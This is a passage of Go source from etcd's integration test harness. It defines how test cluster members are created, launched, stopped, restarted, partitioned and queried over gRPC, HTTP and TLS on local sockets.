MemberNumber: memberNumber,
AuthToken: c.Cfg.AuthToken,
PeerTLS: c.Cfg.PeerTLS,
ClientTLS: c.Cfg.ClientTLS,
QuotaBackendBytes: c.Cfg.QuotaBackendBytes,
MaxTxnOps: c.Cfg.MaxTxnOps,
MaxRequestBytes: c.Cfg.MaxRequestBytes,
SnapshotCount: c.Cfg.SnapshotCount,
SnapshotCatchUpEntries: c.Cfg.SnapshotCatchUpEntries,
GrpcKeepAliveMinTime: c.Cfg.GRPCKeepAliveMinTime,
GrpcKeepAliveInterval: c.Cfg.GRPCKeepAliveInterval,
GrpcKeepAliveTimeout: c.Cfg.GRPCKeepAliveTimeout,
ClientMaxCallSendMsgSize: c.Cfg.ClientMaxCallSendMsgSize,
ClientMaxCallRecvMsgSize: c.Cfg.ClientMaxCallRecvMsgSize,
UseIP: c.Cfg.UseIP,
UseBridge: c.Cfg.UseBridge,
UseTCP: c.Cfg.UseTCP,
EnableLeaseCheckpoint: c.Cfg.EnableLeaseCheckpoint,
LeaseCheckpointInterval: c.Cfg.LeaseCheckpointInterval,
LeaseCheckpointPersist: c.Cfg.LeaseCheckpointPersist,
WatchProgressNotifyInterval: c.Cfg.WatchProgressNotifyInterval,
ExperimentalMaxLearners: c.Cfg.ExperimentalMaxLearners,
StrictReconfigCheck: c.Cfg.StrictReconfigCheck,
})
m.DiscoveryURL = c.Cfg.DiscoveryURL
return m
}
// addMember return PeerURLs of the added member.
func (c *Cluster) addMember(t testutil.TB) types.URLs {
m := c.mustNewMember(t)
scheme := SchemeFromTLSInfo(c.Cfg.PeerTLS)
// send add request to the Cluster
var err error
for i := 0; i < len(c.Members); i++ {
clientURL := c.URL(i)
peerURL := scheme + "://" + m.PeerListeners[0].Addr().String()
if err = c.AddMemberByURL(t, clientURL, peerURL); err == nil {
break
}
}
if err != nil {
t.Fatalf("add member failed on all members error: %v", err)
}
m.InitialPeerURLsMap = types.URLsMap{}
for _, mm := range c.Members {
m.InitialPeerURLsMap[mm.Name] = mm.PeerURLs
}
m.InitialPeerURLsMap[m.Name] = m.PeerURLs
m.NewCluster = false
if err := m.Launch(); err != nil {
t.Fatal(err)
}
c.Members = append(c.Members, m)
// wait Cluster to be stable to receive future client requests
c.WaitMembersMatch(t, c.HTTPMembers())
return m.PeerURLs
}
func (c *Cluster) AddMemberByURL(t testutil.TB, clientURL, peerURL string) error {
cc := MustNewHTTPClient(t, []string{clientURL}, c.Cfg.ClientTLS)
ma := client.NewMembersAPI(cc)
ctx, cancel := context.WithTimeout(context.Background(), RequestTimeout)
_, err := ma.Add(ctx, peerURL)
cancel()
if err != nil {
return err
}
// wait for the add node entry applied in the Cluster
members := append(c.HTTPMembers(), client.Member{PeerURLs: []string{peerURL}, ClientURLs: []string{}})
c.WaitMembersMatch(t, members)
return nil
}
// AddMember return PeerURLs of the added member.
func (c *Cluster) AddMember(t testutil.TB) types.URLs {
return c.addMember(t)
}
func (c *Cluster) MustRemoveMember(t testutil.TB, id uint64) {
if err := c.RemoveMember(t, id); err != nil {
t.Fatal(err)
}
}
func (c *Cluster) RemoveMember(t testutil.TB, id uint64) error {
// send remove request to the Cluster
cc := MustNewHTTPClient(t, c.URLs(), c.Cfg.ClientTLS)
ma := client.NewMembersAPI(cc)
ctx, cancel := context.WithTimeout(context.Background(), RequestTimeout)
err := ma.Remove(ctx, types.ID(id).String())
cancel()
if err != nil {
return err
}
newMembers := make([]*Member, 0)
for _, m := range c.Members {
if uint64(m.Server.ID()) != id {
newMembers = append(newMembers, m)
} else {
m.Client.Close()
select {
case <-m.Server.StopNotify():
m.Terminate(t)
// 1s stop delay + election timeout + 1s disk and network delay + connection write timeout
// TODO: remove connection write timeout by selecting on http response closeNotifier
// blocking on https://github.com/golang/go/issues/9524
case <-time.After(time.Second + time.Duration(ElectionTicks)*TickDuration + time.Second + rafthttp.ConnWriteTimeout):
t.Fatalf("failed to remove member %s in time", m.Server.ID())
}
}
}
c.Members = newMembers
c.WaitMembersMatch(t, c.HTTPMembers())
return nil
}
func (c *Cluster) WaitMembersMatch(t testutil.TB, membs []client.Member) {
for _, u := range c.URLs() {
cc := MustNewHTTPClient(t, []string{u}, c.Cfg.ClientTLS)
ma := client.NewMembersAPI(cc)
for {
ctx, cancel := context.WithTimeout(context.Background(), RequestTimeout)
ms, err := ma.List(ctx)
cancel()
if err == nil && isMembersEqual(ms, membs) {
break
}
time.Sleep(TickDuration)
}
}
}
// WaitLeader returns index of the member in c.Members that is leader (or -1).
func (c *Cluster) WaitLeader(t testutil.TB) int { return c.WaitMembersForLeader(t, c.Members) }
// WaitMembersForLeader waits until given members agree on the same leader,
// and returns its 'index' in the 'membs' list (or -1).
func (c *Cluster) WaitMembersForLeader(t testutil.TB, membs []*Member) int {
possibleLead := make(map[uint64]bool)
var lead uint64
for _, m := range membs {
possibleLead[uint64(m.Server.ID())] = true
}
cc := MustNewHTTPClient(t, getMembersURLs(membs), nil)
kapi := client.NewKeysAPI(cc)
// ensure leader is up via linearizable get
for {
ctx, cancel := context.WithTimeout(context.Background(), 10*TickDuration+time.Second)
_, err := kapi.Get(ctx, "0", &client.GetOptions{Quorum: true})
cancel()
if err == nil || strings.Contains(err.Error(), "Key not found") {
break
}
}
for lead == 0 || !possibleLead[lead] {
lead = 0
for _, m := range membs {
select {
case <-m.Server.StopNotify():
continue
default:
}
if lead != 0 && lead != m.Server.Lead() {
lead = 0
time.Sleep(10 * TickDuration)
break
}
lead = m.Server.Lead()
}
}
for i, m := range membs {
if uint64(m.Server.ID()) == lead {
return i
}
}
return -1
}
func (c *Cluster) WaitNoLeader() { c.WaitMembersNoLeader(c.Members) }
// WaitMembersNoLeader waits until given members lose leader.
func (c *Cluster) WaitMembersNoLeader(membs []*Member) {
noLeader := false
for !noLeader {
noLeader = true
for _, m := range membs {
select {
case <-m.Server.StopNotify():
continue
default:
}
if m.Server.Lead() != 0 {
noLeader = false
time.Sleep(10 * TickDuration)
break
}
}
}
}
func (c *Cluster) waitVersion() {
for _, m := range c.Members {
for {
if m.Server.ClusterVersion() != nil {
break
}
time.Sleep(TickDuration)
}
}
}
// isMembersEqual checks whether two members equal except ID field.
// The given wmembs should always set ID field to empty string.
func isMembersEqual(membs []client.Member, wmembs []client.Member) bool {
sort.Sort(SortableMemberSliceByPeerURLs(membs))
sort.Sort(SortableMemberSliceByPeerURLs(wmembs))
for i := range membs {
membs[i].ID = ""
}
return reflect.DeepEqual(membs, wmembs)
}
func newLocalListener(t testutil.TB) net.Listener {
c := atomic.AddInt32(&LocalListenCount, 1)
// Go 1.8+ allows only numbers in port
addr := fmt.Sprintf("127.0.0.1:%05d%05d", c+BasePort, os.Getpid())
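// e.g. c=1, pid=12345 -> "127.0.0.1:2100112345"; NewListenerWithAddr opens a
// unix socket with this name, so the oversized "port" is never dialed as TCP.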
return NewListenerWithAddr(t, addr)
}
func NewListenerWithAddr(t testutil.TB, addr string) net.Listener {
l, err := transport.NewUnixListener(addr)
if err != nil {
t.Fatal(err)
}
return l
}
type Member struct {
config.ServerConfig
UniqNumber int
MemberNumber int
PeerListeners, ClientListeners []net.Listener
GrpcListener net.Listener
// PeerTLSInfo enables peer TLS when set
PeerTLSInfo *transport.TLSInfo
// ClientTLSInfo enables client TLS when set
ClientTLSInfo *transport.TLSInfo
DialOptions []grpc.DialOption
RaftHandler *testutil.PauseableHandler
Server *etcdserver.EtcdServer
ServerClosers []func()
GrpcServerOpts []grpc.ServerOption
GrpcServer *grpc.Server
GrpcServerPeer *grpc.Server
GrpcURL string
GrpcBridge *bridge
// ServerClient is a clientv3 that directly calls the etcdserver.
ServerClient *clientv3.Client
// Client is a clientv3 that communicates via socket, either UNIX or TCP.
Client *clientv3.Client
KeepDataDirTerminate bool
ClientMaxCallSendMsgSize int
ClientMaxCallRecvMsgSize int
UseIP bool
UseBridge bool
UseTCP bool
IsLearner bool
Closed bool
GrpcServerRecorder *grpc_testing.GrpcRecorder
}
func (m *Member) GRPCURL() string { return m.GrpcURL }
type MemberConfig struct {
Name string
UniqNumber int64
MemberNumber int
PeerTLS *transport.TLSInfo
ClientTLS *transport.TLSInfo
AuthToken string
QuotaBackendBytes int64
MaxTxnOps uint
MaxRequestBytes uint
SnapshotCount uint64
SnapshotCatchUpEntries uint64
GrpcKeepAliveMinTime time.Duration
GrpcKeepAliveInterval time.Duration
GrpcKeepAliveTimeout time.Duration
ClientMaxCallSendMsgSize int
ClientMaxCallRecvMsgSize int
UseIP bool
UseBridge bool
UseTCP bool
EnableLeaseCheckpoint bool
LeaseCheckpointInterval time.Duration
LeaseCheckpointPersist bool
WatchProgressNotifyInterval time.Duration
ExperimentalMaxLearners int
StrictReconfigCheck bool
}
// MustNewMember returns an initialized member with the given name. If peerTLS is
// set, it will use https scheme to communicate between peers.
func MustNewMember(t testutil.TB, mcfg MemberConfig) *Member {
var err error
m := &Member{
MemberNumber: mcfg.MemberNumber,
UniqNumber: int(atomic.AddInt32(&LocalListenCount, 1)),
}
peerScheme := SchemeFromTLSInfo(mcfg.PeerTLS)
clientScheme := SchemeFromTLSInfo(mcfg.ClientTLS)
pln := newLocalListener(t)
m.PeerListeners = []net.Listener{pln}
m.PeerURLs, err = types.NewURLs([]string{peerScheme + "://" + pln.Addr().String()})
if err != nil {
t.Fatal(err)
}
m.PeerTLSInfo = mcfg.PeerTLS
cln := newLocalListener(t)
m.ClientListeners = []net.Listener{cln}
m.ClientURLs, err = types.NewURLs([]string{clientScheme + "://" + cln.Addr().String()})
if err != nil {
t.Fatal(err)
}
m.ClientTLSInfo = mcfg.ClientTLS
m.Name = mcfg.Name
m.DataDir, err = os.MkdirTemp(t.TempDir(), "etcd")
if err != nil {
t.Fatal(err)
}
clusterStr := fmt.Sprintf("%s=%s://%s", mcfg.Name, peerScheme, pln.Addr().String())
m.InitialPeerURLsMap, err = types.NewURLsMap(clusterStr)
if err != nil {
t.Fatal(err)
}
m.InitialClusterToken = ClusterName
m.NewCluster = true
m.BootstrapTimeout = 10 * time.Millisecond
if m.PeerTLSInfo != nil {
m.ServerConfig.PeerTLSInfo = *m.PeerTLSInfo
}
m.ElectionTicks = ElectionTicks
m.InitialElectionTickAdvance = true
m.TickMs = uint(TickDuration / time.Millisecond)
m.QuotaBackendBytes = mcfg.QuotaBackendBytes
m.MaxTxnOps = mcfg.MaxTxnOps
if m.MaxTxnOps == 0 {
m.MaxTxnOps = embed.DefaultMaxTxnOps
}
m.MaxRequestBytes = mcfg.MaxRequestBytes
if m.MaxRequestBytes == 0 {
m.MaxRequestBytes = embed.DefaultMaxRequestBytes
}
m.SnapshotCount = etcdserver.DefaultSnapshotCount
if mcfg.SnapshotCount != 0 {
m.SnapshotCount = mcfg.SnapshotCount
}
m.SnapshotCatchUpEntries = etcdserver.DefaultSnapshotCatchUpEntries
if mcfg.SnapshotCatchUpEntries != 0 {
m.SnapshotCatchUpEntries = mcfg.SnapshotCatchUpEntries
}
// for the purpose of integration testing, simple token is enough
m.AuthToken = "simple"
if mcfg.AuthToken != "" {
m.AuthToken = mcfg.AuthToken
}
m.BcryptCost = uint(bcrypt.MinCost) // use min bcrypt cost to speed up integration testing
m.GrpcServerOpts = []grpc.ServerOption{}
if mcfg.GrpcKeepAliveMinTime > time.Duration(0) {
m.GrpcServerOpts = append(m.GrpcServerOpts, grpc.KeepaliveEnforcementPolicy(keepalive.EnforcementPolicy{
MinTime: mcfg.GrpcKeepAliveMinTime,
PermitWithoutStream: false,
}))
}
if mcfg.GrpcKeepAliveInterval > time.Duration(0) &&
mcfg.GrpcKeepAliveTimeout > time.Duration(0) {
m.GrpcServerOpts = append(m.GrpcServerOpts, grpc.KeepaliveParams(keepalive.ServerParameters{
Time: mcfg.GrpcKeepAliveInterval,
Timeout: mcfg.GrpcKeepAliveTimeout,
}))
}
m.ClientMaxCallSendMsgSize = mcfg.ClientMaxCallSendMsgSize
m.ClientMaxCallRecvMsgSize = mcfg.ClientMaxCallRecvMsgSize
m.UseIP = mcfg.UseIP
m.UseBridge = mcfg.UseBridge
m.UseTCP = mcfg.UseTCP
m.EnableLeaseCheckpoint = mcfg.EnableLeaseCheckpoint
m.LeaseCheckpointInterval = mcfg.LeaseCheckpointInterval
m.LeaseCheckpointPersist = mcfg.LeaseCheckpointPersist
m.WatchProgressNotifyInterval = mcfg.WatchProgressNotifyInterval
m.InitialCorruptCheck = true
m.WarningApplyDuration = embed.DefaultWarningApplyDuration
m.WarningUnaryRequestDuration = embed.DefaultWarningUnaryRequestDuration
m.ExperimentalMaxLearners = membership.DefaultMaxLearners
if mcfg.ExperimentalMaxLearners != 0 {
m.ExperimentalMaxLearners = mcfg.ExperimentalMaxLearners
}
m.V2Deprecation = config.V2_DEPR_DEFAULT
m.GrpcServerRecorder = &grpc_testing.GrpcRecorder{}
m.Logger = memberLogger(t, mcfg.Name)
m.StrictReconfigCheck = mcfg.StrictReconfigCheck
if err := m.listenGRPC(); err != nil {
t.Fatal(err)
}
t.Cleanup(func() {
// if we didn't cleanup the logger, the consecutive test
// might reuse this (t).
raft.ResetDefaultLogger()
})
return m
}
func memberLogger(t testutil.TB, name string) *zap.Logger {
level := zapcore.InfoLevel
if os.Getenv("CLUSTER_DEBUG") != "" {
level = zapcore.DebugLevel
}
options := zaptest.WrapOptions(zap.Fields(zap.String("member", name)))
return zaptest.NewLogger(t, zaptest.Level(level), options).Named(name)
}
// listenGRPC starts a grpc server over a unix domain socket (or a TCP socket when UseTCP is set) on the member
func (m *Member) listenGRPC() error {
// prefix with localhost so cert has right domain
network, host, port := m.grpcAddr()
grpcAddr := host + ":" + port
m.Logger.Info("LISTEN GRPC", zap.String("grpcAddr", grpcAddr), zap.String("m.Name", m.Name))
grpcListener, err := net.Listen(network, grpcAddr)
if err != nil {
return fmt.Errorf("listen failed on grpc socket %s (%v)", grpcAddr, err)
}
m.GrpcURL = fmt.Sprintf("%s://%s", m.clientScheme(), grpcAddr)
if m.UseBridge {
_, err = m.addBridge()
if err != nil {
grpcListener.Close()
return err
}
}
m.GrpcListener = grpcListener
return nil
}
func (m *Member) clientScheme() string {
switch {
case m.UseTCP && m.ClientTLSInfo != nil:
return "https"
case m.UseTCP && m.ClientTLSInfo == nil:
return "http"
case !m.UseTCP && m.ClientTLSInfo != nil:
return "unixs"
case !m.UseTCP && m.ClientTLSInfo == nil:
return "unix"
}
m.Logger.Panic("Failed to determine client schema")
return ""
}
func (m *Member) addBridge() (*bridge, error) {
network, host, port := m.grpcAddr()
grpcAddr := host + ":" + port
bridgeAddr := grpcAddr + "0"
m.Logger.Info("LISTEN BRIDGE", zap.String("grpc-address", bridgeAddr), zap.String("member", m.Name))
bridgeListener, err := transport.NewUnixListener(bridgeAddr)
if err != nil {
return nil, fmt.Errorf("listen failed on bridge socket %s (%v)", bridgeAddr, err)
}
m.GrpcBridge, err = newBridge(dialer{network: network, addr: grpcAddr}, bridgeListener)
if err != nil {
bridgeListener.Close()
return nil, err
}
m.GrpcURL = m.clientScheme() + "://" + bridgeAddr
return m.GrpcBridge, nil
}
func (m *Member) Bridge() *bridge {
if !m.UseBridge {
m.Logger.Panic("Bridge not available. Please configure using bridge before creating Cluster.")
}
return m.GrpcBridge
}
func (m *Member) grpcAddr() (network, host, port string) {
// prefix with localhost so cert has right domain
host = "localhost"
if m.UseIP { // for IP-only TLS certs
host = "127.0.0.1"
}
network = "unix"
if m.UseTCP {
network = "tcp"
}
port = m.Name
if m.UseTCP {
port = fmt.Sprintf("%d", GrpcPortNumber(m.UniqNumber, m.MemberNumber))
}
return network, host, port
}
func GrpcPortNumber(uniqNumber, memberNumber int) int {
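// e.g. uniqNumber=3, memberNumber=2 -> 30000 + 3*10 + 2 = 30032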
return BaseGRPCPort + uniqNumber*10 + memberNumber
}
type dialer struct {
network string
addr string
}
func (d dialer) Dial() (net.Conn, error) {
return net.Dial(d.network, d.addr)
}
func (m *Member) ElectionTimeout() time.Duration {
return time.Duration(m.Server.Cfg.ElectionTicks*int(m.Server.Cfg.TickMs)) * time.Millisecond
}
func (m *Member) ID() types.ID { return m.Server.ID() }
// NewClientV3 creates a new grpc client connection to the member
func NewClientV3(m *Member) (*clientv3.Client, error) {
if m.GrpcURL == "" {
return nil, fmt.Errorf("member not configured for grpc")
}
cfg := clientv3.Config{
Endpoints: []string{m.GrpcURL},
DialTimeout: 5 * time.Second,
DialOptions: []grpc.DialOption{grpc.WithBlock()},
MaxCallSendMsgSize: m.ClientMaxCallSendMsgSize,
MaxCallRecvMsgSize: m.ClientMaxCallRecvMsgSize,
Logger: m.Logger.Named("client"),
}
if m.ClientTLSInfo != nil {
tls, err := m.ClientTLSInfo.ClientConfig()
if err != nil {
return nil, err
}
cfg.TLS = tls
}
if m.DialOptions != nil {
cfg.DialOptions = append(cfg.DialOptions, m.DialOptions...)
}
return newClientV3(cfg)
}
// Clone returns a member with the same server configuration. The returned
// member will not set PeerListeners and ClientListeners.
func (m *Member) Clone(t testutil.TB) *Member {
mm := &Member{}
mm.ServerConfig = m.ServerConfig
var err error
clientURLStrs := m.ClientURLs.StringSlice()
mm.ClientURLs, err = types.NewURLs(clientURLStrs)
if err != nil {
// this should never fail
panic(err)
}
peerURLStrs := m.PeerURLs.StringSlice()
mm.PeerURLs, err = types.NewURLs(peerURLStrs)
if err != nil {
// this should never fail
panic(err)
}
clusterStr := m.InitialPeerURLsMap.String()
mm.InitialPeerURLsMap, err = types.NewURLsMap(clusterStr)
if err != nil {
// this should never fail
panic(err)
}
mm.InitialClusterToken = m.InitialClusterToken
mm.ElectionTicks = m.ElectionTicks
mm.PeerTLSInfo = m.PeerTLSInfo
mm.ClientTLSInfo = m.ClientTLSInfo
mm.Logger = memberLogger(t, mm.Name+"c")
return mm
}
// Launch starts a member based on ServerConfig, PeerListeners
// and ClientListeners.
func (m *Member) Launch() error {
m.Logger.Info(
"launching a member",
zap.String("name", m.Name),
zap.Strings("advertise-peer-urls", m.PeerURLs.StringSlice()),
zap.Strings("listen-client-urls", m.ClientURLs.StringSlice()),
zap.String("grpc-url", m.GrpcURL),
)
var err error
if m.Server, err = etcdserver.NewServer(m.ServerConfig); err != nil {
return fmt.Errorf("failed to initialize the etcd server: %v", err)
}
m.Server.SyncTicker = time.NewTicker(500 * time.Millisecond)
m.Server.Start()
var peerTLScfg *tls.Config
if m.PeerTLSInfo != nil && !m.PeerTLSInfo.Empty() {
if peerTLScfg, err = m.PeerTLSInfo.ServerConfig(); err != nil {
return err
}
}
if m.GrpcListener != nil {
var (
tlscfg *tls.Config
)
if m.ClientTLSInfo != nil && !m.ClientTLSInfo.Empty() {
tlscfg, err = m.ClientTLSInfo.ServerConfig()
if err != nil {
return err
}
}
m.GrpcServer = v3rpc.Server(m.Server, tlscfg, m.GrpcServerRecorder.UnaryInterceptor(), m.GrpcServerOpts...)
m.GrpcServerPeer = v3rpc.Server(m.Server, peerTLScfg, m.GrpcServerRecorder.UnaryInterceptor())
m.ServerClient = v3client.New(m.Server)
lockpb.RegisterLockServer(m.GrpcServer, v3lock.NewLockServer(m.ServerClient))
epb.RegisterElectionServer(m.GrpcServer, v3election.NewElectionServer(m.ServerClient))
go m.GrpcServer.Serve(m.GrpcListener)
}
m.RaftHandler = &testutil.PauseableHandler{Next: etcdhttp.NewPeerHandler(m.Logger, m.Server)}
h := (http.Handler)(m.RaftHandler)
if m.GrpcListener != nil {
h = http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if r.ProtoMajor == 2 && strings.Contains(r.Header.Get("Content-Type"), "application/grpc") {
m.GrpcServerPeer.ServeHTTP(w, r)
} else {
m.RaftHandler.ServeHTTP(w, r)
}
})
}
for _, ln := range m.PeerListeners {
cm := cmux.New(ln)
// don't hang on matcher after closing listener
cm.SetReadTimeout(time.Second)
if m.GrpcServer != nil {
grpcl := cm.Match(cmux.HTTP2())
go m.GrpcServerPeer.Serve(grpcl)
}
// serve http1/http2 rafthttp/grpc
ll := cm.Match(cmux.Any())
if peerTLScfg != nil {
if ll, err = transport.NewTLSListener(ll, m.PeerTLSInfo); err != nil {
return err
}
}
hs := &httptest.Server{
Listener: ll,
Config: &http.Server{
Handler: h,
TLSConfig: peerTLScfg,
ErrorLog: log.New(io.Discard, "net/http", 0),
},
TLS: peerTLScfg,
}
hs.Start()
donec := make(chan struct{})
go func() {
defer close(donec)
cm.Serve()
}()
closer := func() {
ll.Close()
hs.CloseClientConnections()
hs.Close()
<-donec
}
m.ServerClosers = append(m.ServerClosers, closer)
}
for _, ln := range m.ClientListeners {
hs := &httptest.Server{
Listener: ln,
Config: &http.Server{
Handler: v2http.NewClientHandler(
m.Logger,
m.Server,
m.ServerConfig.ReqTimeout(),
),
ErrorLog: log.New(io.Discard, "net/http", 0),
},
}
if m.ClientTLSInfo == nil {
hs.Start()
} else {
info := m.ClientTLSInfo
hs.TLS, err = info.ServerConfig()
if err != nil {
return err
}
// baseConfig is called on initial TLS handshake start.
//
// Previously,
// 1. Server has non-empty (*tls.Config).Certificates on client hello
// 2. Server calls (*tls.Config).GetCertificate iff:
// - Server's (*tls.Config).Certificates is not empty, or
// - Client supplies SNI; non-empty (*tls.ClientHelloInfo).ServerName
//
// When (*tls.Config).Certificates is always populated on initial handshake,
// client is expected to provide a valid matching SNI to pass the TLS
// verification, thus trigger server (*tls.Config).GetCertificate to reload
// TLS assets. However, a cert whose SAN field does not include domain names
// but only IP addresses, has empty (*tls.ClientHelloInfo).ServerName, thus
// it was never able to trigger TLS reload on initial handshake; first
// certificate object was being used, never being updated.
//
// Now, (*tls.Config).Certificates is created empty on initial TLS client
// handshake, in order to trigger (*tls.Config).GetCertificate and populate
// rest of the certificates on every new TLS connection, even when client
// SNI is empty (e.g. cert only includes IPs).
//
// This introduces another problem with "httptest.Server":
// when server initial certificates are empty, certificates
// are overwritten by Go's internal test certs, which have
// different SAN fields (e.g. example.com). To work around,
// re-overwrite (*tls.Config).Certificates before starting
// test server.
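// The reload-friendly shape described above looks roughly like the following
// (a sketch, not part of this test setup; certFile/keyFile are placeholders):
//
//	cfg := &tls.Config{
//		Certificates: nil, // left empty on purpose: force GetCertificate per handshake
//		GetCertificate: func(*tls.ClientHelloInfo) (*tls.Certificate, error) {
//			return tlsutil.NewCert(certFile, keyFile, nil) // re-read from disk
//		},
//	}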
tlsCert, err := tlsutil.NewCert(info.CertFile, info.KeyFile, nil)
if err != nil {
return err
}
hs.TLS.Certificates = []tls.Certificate{*tlsCert}
hs.StartTLS()
}
closer := func() {
ln.Close()
hs.CloseClientConnections()
hs.Close()
}
m.ServerClosers = append(m.ServerClosers, closer)
}
if m.GrpcURL != "" && m.Client == nil {
m.Client, err = NewClientV3(m)
if err != nil {
return err
}
}
m.Logger.Info(
"launched a member",
zap.String("name", m.Name),
zap.Strings("advertise-peer-urls", m.PeerURLs.StringSlice()),
zap.Strings("listen-client-urls", m.ClientURLs.StringSlice()),
zap.String("grpc-url", m.GrpcURL),
)
return nil
}
func (m *Member) RecordedRequests() []grpc_testing.RequestInfo {
return m.GrpcServerRecorder.RecordedRequests()
}
func (m *Member) WaitOK(t testutil.TB) {
m.WaitStarted(t)
for m.Server.Leader() == 0 {
time.Sleep(TickDuration)
}
}
func (m *Member) WaitStarted(t testutil.TB) {
cc := MustNewHTTPClient(t, []string{m.URL()}, m.ClientTLSInfo)
kapi := client.NewKeysAPI(cc)
for {
ctx, cancel := context.WithTimeout(context.Background(), RequestTimeout)
_, err := kapi.Get(ctx, "/", nil)
if err != nil {
time.Sleep(TickDuration)
continue
}
cancel()
break
}
}
func WaitClientV3(t testutil.TB, kv clientv3.KV) {
timeout := time.Now().Add(RequestTimeout)
var err error
for time.Now().Before(timeout) {
ctx, cancel := context.WithTimeout(context.Background(), RequestTimeout)
_, err = kv.Get(ctx, "/")
cancel()
if err == nil {
return
}
time.Sleep(TickDuration)
}
if err != nil {
t.Fatalf("timed out waiting for client: %v", err)
}
}
func (m *Member) URL() string { return m.ClientURLs[0].String() }
func (m *Member) Pause() {
m.RaftHandler.Pause()
m.Server.PauseSending()
}
func (m *Member) Resume() {
m.RaftHandler.Resume()
m.Server.ResumeSending()
}
// Close stops the member's etcdserver and closes its connections
func (m *Member) Close() {
if m.GrpcBridge != nil {
m.GrpcBridge.Close()
m.GrpcBridge = nil
}
if m.ServerClient != nil {
m.ServerClient.Close()
m.ServerClient = nil
}
if m.GrpcServer != nil {
ch := make(chan struct{})
go func() {
defer close(ch)
// close listeners to stop accepting new connections,
// will block on any existing transports
m.GrpcServer.GracefulStop()
}()
// wait until all pending RPCs are finished
select {
case <-ch:
case <-time.After(2 * time.Second):
// took too long, manually close open transports
// e.g. watch streams
m.GrpcServer.Stop()
<-ch
}
m.GrpcServer = nil
m.GrpcServerPeer.GracefulStop()
m.GrpcServerPeer.Stop()
m.GrpcServerPeer = nil
}
if m.Server != nil {
m.Server.HardStop()
}
for _, f := range m.ServerClosers {
f()
}
if !m.Closed {
// Avoid verification of the same file multiple times
// (that might not exist any longer)
verify.MustVerifyIfEnabled(verify.Config{
Logger: m.Logger,
DataDir: m.DataDir,
ExactIndex: false,
})
}
m.Closed = true
}
// Stop stops the member, but the data dir of the member is preserved.
func (m *Member) Stop(_ testutil.TB) {
m.Logger.Info(
"stopping a member",
zap.String("name", m.Name),
zap.Strings("advertise-peer-urls", m.PeerURLs.StringSlice()),
zap.Strings("listen-client-urls", m.ClientURLs.StringSlice()),
zap.String("grpc-url", m.GrpcURL),
)
m.Close()
m.ServerClosers = nil
m.Logger.Info(
"stopped a member",
zap.String("name", m.Name),
zap.Strings("advertise-peer-urls", m.PeerURLs.StringSlice()),
zap.Strings("listen-client-urls", m.ClientURLs.StringSlice()),
zap.String("grpc-url", m.GrpcURL),
)
}
// CheckLeaderTransition waits for leader transition, returning the new leader ID.
func CheckLeaderTransition(m *Member, oldLead uint64) uint64 {
interval := time.Duration(m.Server.Cfg.TickMs) * time.Millisecond
for m.Server.Lead() == 0 || (m.Server.Lead() == oldLead) {
time.Sleep(interval)
}
return m.Server.Lead()
}
// StopNotify unblocks when a member stop completes
func (m *Member) StopNotify() <-chan struct{} {
return m.Server.StopNotify()
}
// Restart starts the member using the preserved data dir.
func (m *Member) Restart(t testutil.TB) error {
m.Logger.Info(
"restarting a member",
zap.String("name", m.Name),
zap.Strings("advertise-peer-urls", m.PeerURLs.StringSlice()),
zap.Strings("listen-client-urls", m.ClientURLs.StringSlice()),
zap.String("grpc-url", m.GrpcURL),
)
newPeerListeners := make([]net.Listener, 0)
for _, ln := range m.PeerListeners {
newPeerListeners = append(newPeerListeners, NewListenerWithAddr(t, ln.Addr().String()))
}
m.PeerListeners = newPeerListeners
newClientListeners := make([]net.Listener, 0)
for _, ln := range m.ClientListeners {
newClientListeners = append(newClientListeners, NewListenerWithAddr(t, ln.Addr().String()))
}
m.ClientListeners = newClientListeners
if m.GrpcListener != nil {
if err := m.listenGRPC(); err != nil {
t.Fatal(err)
}
}
err := m.Launch()
m.Logger.Info(
"restarted a member",
zap.String("name", m.Name),
zap.Strings("advertise-peer-urls", m.PeerURLs.StringSlice()),
zap.Strings("listen-client-urls", m.ClientURLs.StringSlice()),
zap.String("grpc-url", m.GrpcURL),
zap.Error(err),
)
return err
}
// Terminate stops the member and removes the data dir.
func (m *Member) Terminate(t testutil.TB) {
m.Logger.Info(
"terminating a member",
zap.String("name", m.Name),
zap.Strings("advertise-peer-urls", m.PeerURLs.StringSlice()),
zap.Strings("listen-client-urls", m.ClientURLs.StringSlice()),
zap.String("grpc-url", m.GrpcURL),
)
m.Close()
if !m.KeepDataDirTerminate {
if err := os.RemoveAll(m.ServerConfig.DataDir); err != nil {
t.Fatal(err)
}
}
m.Logger.Info(
"terminated a member",
zap.String("name", m.Name),
zap.Strings("advertise-peer-urls", m.PeerURLs.StringSlice()),
zap.Strings("listen-client-urls", m.ClientURLs.StringSlice()),
zap.String("grpc-url", m.GrpcURL),
)
}
// Metric gets the metric value for a member
func (m *Member) Metric(metricName string, expectLabels ...string) (string, error) {
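// e.g. metricName "etcd_server_version" matches a Prometheus text line like
//   etcd_server_version{server_version="3.5.0"} 1
// and the second space-separated field ("1") is returned.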
cfgtls := transport.TLSInfo{}
tr, err := transport.NewTimeoutTransport(cfgtls, time.Second, time.Second, time.Second)
if err != nil {
return "", err
}
cli := &http.Client{Transport: tr}
resp, err := cli.Get(m.ClientURLs[0].String() + "/metrics")
if err != nil {
return "", err
}
defer resp.Body.Close()
b, rerr := io.ReadAll(resp.Body)
if rerr != nil {
return "", rerr
}
lines := strings.Split(string(b), "\n")
for _, l := range lines {
if !strings.HasPrefix(l, metricName) {
continue
}
ok := true
for _, lv := range expectLabels {
if !strings.Contains(l, lv) {
ok = false
break
}
}
if !ok {
continue
}
return strings.Split(l, " ")[1], nil
}
return "", nil
}
// InjectPartition drops connections from m to others, vice versa.
func (m *Member) InjectPartition(t testutil.TB, others ...*Member) {
for _, other := range others {
m.Server.CutPeer(other.Server.ID())
other.Server.CutPeer(m.Server.ID())
t.Logf("network partition injected between: %v <-> %v", m.Server.ID(), other.Server.ID())
}
}
// RecoverPartition recovers connections from m to others, vice versa.
func (m *Member) RecoverPartition(t testutil.TB, others ...*Member) {
for _, other := range others {
m.Server.MendPeer(other.Server.ID())
other.Server.MendPeer(m.Server.ID())
t.Logf("network partition between: %v <-> %v", m.Server.ID(), other.Server.ID())
}
}
func (m *Member) ReadyNotify() <-chan struct{} {
return m.Server.ReadyNotify()
}
func MustNewHTTPClient(t testutil.TB, eps []string, tls *transport.TLSInfo) client.Client {
cfgtls := transport.TLSInfo{}
if tls != nil {
cfgtls = *tls
}
cfg := client.Config{Transport: mustNewTransport(t, cfgtls), Endpoints: eps}
c, err := client.New(cfg)
if err != nil {
t.Fatal(err)
}
return c
}
